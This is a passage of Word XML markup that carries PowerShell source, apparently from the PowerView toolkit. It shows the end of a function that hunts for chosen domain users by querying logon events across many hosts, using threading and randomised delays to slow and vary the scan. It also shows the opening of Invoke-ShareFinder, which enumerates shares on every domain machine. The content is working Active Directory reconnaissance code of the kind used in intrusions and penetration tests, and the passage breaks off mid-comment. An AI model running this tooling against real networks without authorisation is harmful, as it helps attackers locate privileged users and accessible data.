    <w:p w14:paraId="364FCDC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # users we're going to be searching for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E95737A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetUsers = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367BEDA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4B5913CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        # if we want to hunt for the effective domain users who can access a target server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3359B482" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($TargetServer) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136E9D92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Querying target server '$TargetServer' for local users"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159FA250" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetUsers = Get-NetLocalGroup $TargetServer -Recurse | Where-Object {(-not $_.IsGroup) -and $_.IsDomain } | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28229A5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                ($_.AccountName).split("/")[1].toLower()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52882684" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }  | Where-Object {$_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3A7C28" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB9DB13" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if we get a specific username, only use that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47167238" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif($UserName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4328B42C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # Write-Verbose "[*] Using target user '$UserName'..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B94D00F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetUsers = $UserName | ForEach-Object {$_.ToLower()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FE7B48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($TargetUsers -isnot [System.Array]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCC5CF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetUsers = @($TargetUsers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A17211B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645DFD8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D4BDB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # read in a target user list if we have one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707E4DB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif($UserFile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3877A56B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetUsers = Get-Content -Path $UserFile | Where-Object {$_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6111C82B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023912B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif($UserADSpath -or $UserFilter) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628F719C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Domain in $TargetDomains) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34064EEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "[*] Querying domain $Domain for users"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710EE875" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetUsers += Get-NetUser -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $UserADSpath -Filter $UserFilter | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F8D533" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $_.samaccountname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C17F9BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }  | Where-Object {$_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED4BD4D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626EED31" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548E4FCF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72989E53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Domain in $TargetDomains) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FEC618" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "[*] Querying domain $Domain for users of group '$GroupName'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40026EF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetUsers += Get-NetGroupMember -GroupName $GroupName -Domain $Domain -DomainController $DomainController -Credential $Credential | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386706CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $_.MemberName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637C5B28" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C1FD53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1120334B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5C8B6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="485DC3DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if (((!$TargetUsers) -or ($TargetUsers.Count -eq 0))) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502FEB5F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            throw "[!] No users found to search for!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59657F8A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DABDC8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="53AF63AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # script block that enumerates a server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8F71F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $HostEnumBlock = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C12BD5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            param($ComputerName, $Ping, $TargetUsers, $SearchDays, $Credential)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F73C9A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="68DCB30A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # optionally check if the server is up first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CD7154" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Up = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65819687" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Ping) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3778B25A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5F0375" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54147466" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Up) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC23F2D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # try to enumerate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FE7E2F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($Credential) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433BACF0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Get-UserEvent -ComputerName $ComputerName -Credential $Credential -EventType 'all' -DateStart ([DateTime]::Today.AddDays(-$SearchDays)) | Where-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63664130" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # filter for the target user set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DFABA5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        $TargetUsers -contains $_.UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C8D7A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B05B4B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F21643" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764CDD15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Get-UserEvent -ComputerName $ComputerName -EventType 'all' -DateStart ([DateTime]::Today.AddDays(-$SearchDays)) | Where-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCA592C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # filter for the target user set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CBF893" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $TargetUsers -contains $_.UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0C0886" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAFF6CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9C663F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0B732D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644E5B97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D1C8C52" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3FDECF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C538DCF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C73F32C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1744C8F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($Threads) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DD4C85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Using threading with threads = $Threads"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CD6008" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="79EA0B50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if we're using threading, kick off the script block with Invoke-ThreadedFunction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C0F85F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ScriptParams = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6005152C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'Ping' = $(-not $NoPing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0A2FD2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'TargetUsers' = $TargetUsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D96847" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'SearchDays' = $SearchDays</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A822F3A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'Credential' = $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5AB031" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652625C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="03837B24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # kick off the threaded script block + arguments </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6617CAA0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C53EF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0D06E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="11CDE9B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238AD9C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if(-not $NoPing -and ($ComputerName.count -ne 1)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D0B2A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # ping all hosts in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0161AB73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFB0FE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9DE271" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4004E001" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="16126B7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB2190F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Counter = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A784A4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="53C7AE30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Computer in $ComputerName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E723A16" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F2B1EE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Counter = $Counter + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644C831D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="664EE698" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # sleep for our semi-randomized interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF1471B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7241DA9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="636C59A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB74FED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $(-not $NoPing), $TargetUsers, $SearchDays, $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69821A27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3228F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0259E9DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E6D993A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9C2D06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B781FB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5A647AFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5BCEB311" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Invoke-ShareFinder {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B882BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787C9E9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDE0D4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="64B1578E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function finds the local domain name for a host using Get-NetDomain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0278C3D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        queries the domain for all active machines with Get-NetComputer, then for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFE0677" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        each server it lists of active shares with Get-NetShare. Non-standard shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454AEAA2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        can be filtered out with -Exclude* flags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66182CE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="487EA062" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Author: @harmj0y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDBB7FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        License: BSD 3-Clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542DCCA2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7C104262" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
